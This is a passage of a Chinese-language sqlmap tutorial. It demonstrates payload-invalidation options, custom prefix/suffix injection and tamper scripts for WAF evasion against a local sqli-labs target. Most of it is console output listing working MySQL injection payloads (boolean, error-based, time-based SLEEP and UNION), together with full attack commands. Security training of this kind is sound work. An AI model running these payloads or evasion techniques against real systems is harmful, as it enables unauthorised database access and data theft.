[09:45:49] [INFO] GET parameter 'id' appears to be dynamic
[09:45:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:45:49] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:45:49] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[09:45:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:45:51] [WARNING] reflective value(s) found and filtering out
[09:45:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[09:45:51] [INFO] testing 'Generic inline queries'
[09:45:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:45:52] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:45:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:45:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:45:52] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:45:52] [INFO] testing 'MySQL inline queries'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:45:52] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:45:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:45:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:46:02] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:46:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:46:02] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:46:02] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:46:02] [INFO] target URL appears to have 3 columns in query
[09:46:03] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8697=8697 AND 'vXiI'='vXiI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4143 FROM(SELECT COUNT(*),CONCAT(0x71786a6271,(SELECT (ELT(4143=4143,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vpOq'='vpOq
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4595 FROM (SELECT(SLEEP(5)))gWzN) AND 'BTap'='BTap
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6582' UNION ALL SELECT NULL,CONCAT(0x71786a6271,0x4f4152547367744d454144444f7859484d52646f6e49564467667458597843725466574363435a6d,0x71767a7a71),NULL-- -
---
[09:46:06] [INFO] the back-end DBMS is MySQL
[09:46:06] [INFO] fetching banner
[09:46:07] [INFO] the back-end DBMS operating system is Linux
[09:46:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS operating system: Linux
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[09:46:07] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:46:07 /2020-03-01/
3.Sqlmap强制设置无效值替换
–invalid-bignum参数
在sqlmap需要使原始参数值无效(例如id=13)时,它使用经典的否定(例如id=-13);
有了参数--invalid-bignum,就可以强制使用大整数值来实现相同的目标(例如id=99999999)。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-bignum --banner -v 5
显示:
可以发现,其中出现了
Payload: id=462284' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6a71,0x676b6a4b566742436e7a6763484c4d6b6d4c6e61736141644542466a65725072454d6a6852677855,0x717a6b6a71)-- -
即在探测时将id设为了较大的值462284。
–invalid-logical参数
有了参数--invalid-logical,就可以强制使用布尔操作来实现相同的目标(例如id=13 and 18=19)。
测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-logical --banner
打印
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:08:58 /2020-03-01/
[10:08:59] [INFO] testing connection to the target URL
[10:08:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:08:59] [INFO] testing if the target URL content is stable
[10:08:59] [INFO] target URL content is stable
[10:08:59] [INFO] testing if GET parameter 'id' is dynamic
[10:08:59] [INFO] GET parameter 'id' appears to be dynamic
[10:08:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:08:59] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:08:59] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:09:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:09:01] [WARNING] reflective value(s) found and filtering out
[10:09:02] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[10:09:02] [INFO] testing 'Generic inline queries'
[10:09:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:09:02] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:09:02] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:09:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:09:02] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[10:09:02] [INFO] testing 'MySQL inline queries'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:09:02] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:09:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:09:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:09:12] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:09:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:09:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:09:12] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:09:12] [INFO] target URL appears to have 3 columns in query
[10:09:12] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3467=3467 AND 'vjnx'='vjnx
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8283 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(8283=8283,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'whel'='whel
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7542 FROM (SELECT(SLEEP(5)))AXCz) AND 'TpNY'='TpNY
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1' AND 71 LIKE 72 UNION ALL SELECT NULL,CONCAT(0x716b627a71,0x4846764a516c586f4e7a4b5853725a43434f57454a5552516a4a494d576c494d4f61615353787549,0x716b7a7871),NULL-- -
---
[10:09:15] [INFO] the back-end DBMS is MySQL
[10:09:15] [INFO] fetching banner
[10:09:15] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[10:09:15] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 10:09:15 /2020-03-01/
显然,出现了
Payload: id=1' AND 71 LIKE 72 UNION ALL SELECT NULL,CONCAT(0x716b627a71,0x4846764a516c586f4e7a4b5853725a43434f57454a5552516a4a494d576c494d4f61615353787549,0x716b7a7871),NULL-- -,
即71 LIKE 72这种逻辑错误。
–invalid-string参数
有了参数--invalid-string,就可以强制使用随机字符串来实现相同的目标(例如id=akewmc)。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-string --banner
打印
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:24:44 /2020-03-01/
[10:24:44] [INFO] testing connection to the target URL
[10:24:44] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:24:44] [INFO] testing if the target URL content is stable
[10:24:45] [INFO] target URL content is stable
[10:24:45] [INFO] testing if GET parameter 'id' is dynamic
[10:24:45] [INFO] GET parameter 'id' appears to be dynamic
[10:24:45] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:24:45] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:24:45] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:24:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:24:48] [WARNING] reflective value(s) found and filtering out
[10:24:48] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[10:24:48] [INFO] testing 'Generic inline queries'
[10:24:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:24:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:24:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:24:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:24:49] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:24:49] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:24:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:24:49] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[10:24:49] [INFO] testing 'MySQL inline queries'
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:24:49] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:24:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:24:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:24:59] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:24:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:24:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:24:59] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test
[10:24:59] [INFO] target URL appears to have 3 columns in query
[10:24:59] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6118=6118 AND 'VaYg'='VaYg
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4130 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(4130=4130,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'stHh'='stHh
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9229 FROM (SELECT(SLEEP(5)))WerB) AND 'LqGE'='LqGE
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=atUzqr' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x6765636e6d4f5655424e4870554575704574706c785866526a79697964754e774c6278726a4b6872,
0x71706b7871)-- -
---
[10:25:03] [INFO] the back-end DBMS is MySQL
[10:25:03] [INFO] fetching banner
[10:25:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[10:25:03] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 10:25:03 /2020-03-01/
出现了
Payload: id=atUzqr' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x6765636e6d4f5655424e4870554575704574706c785866526a79697964754e774c6278726a4b6872,0x71706b7871)-- -,
即强制使用随机字符串atUzqr来进行测试。
4.Sqlmap自定义注入负载位置
在某些情况下,只有当用户提供要附加到注入负载的特定后缀时,易受攻击的参数才可被利用。
当用户已经知道查询语法并希望通过直接提供注入有效负载前缀和后缀来检测和利用SQL注入时,下面这些选项就派上用场了:
- –prefix
设置SQL注入Payload前缀 - –suffix
设置SQL注入Payload后缀
$query = "SELECT * FROM users WHERE id=('.$_GET['id'].') LIMIT 0, 1";
python sqlmap.py -u "http://ip/sqlmap/mysql/get_str_brackets.php\
?id=1" -p id --prefix "')" --suffix " AND ('abc'='abc"
# 以上两句相当于
$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p id --prefix "')" --suffix " AND ('abc'='abc"
打印
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:38:09 /2020-03-01/
[10:38:09] [INFO] testing connection to the target URL
[10:38:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:38:09] [INFO] testing if the target URL content is stable
[10:38:10] [INFO] target URL content is stable
[10:38:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:38:10] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:38:10] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:38:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:38:12] [WARNING] reflective value(s) found and filtering out
[10:38:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:38:12] [INFO] testing 'Generic inline queries'
[10:38:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:38:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:38:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[10:38:12] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[10:38:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:38:12] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:38:12] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[10:38:13] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[10:38:13] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL inline queries'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL AND time-based blind (ELT)'
[10:38:13] [INFO] testing 'MySQL OR time-based blind (ELT)'
[10:38:13] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[10:38:13] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:14] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[10:38:14] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[10:38:14] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[10:38:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:38:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:38:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[10:38:15] [WARNING] GET parameter 'id' does not seem to be injectable
[10:38:15] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 10:38:15 /2020-03-01/
5.Sqlmap设置Tamper脚本
除了单引号之间的字符串被CHAR()类似的表示形式所取代之外,sqlmap本身不会混淆发送的有效负载;
sqlmap通过Tamper脚本来绕过WAF等防御措施,可以在tamper文件夹下找到所有sqlmap自带的tamper脚本。
在自定义注入负载位置时提示使用–tamper参数,现增加参数进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p id --prefix "')" --suffix " AND ('abc'='abc" --tamper=space2comment --banner
打印
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
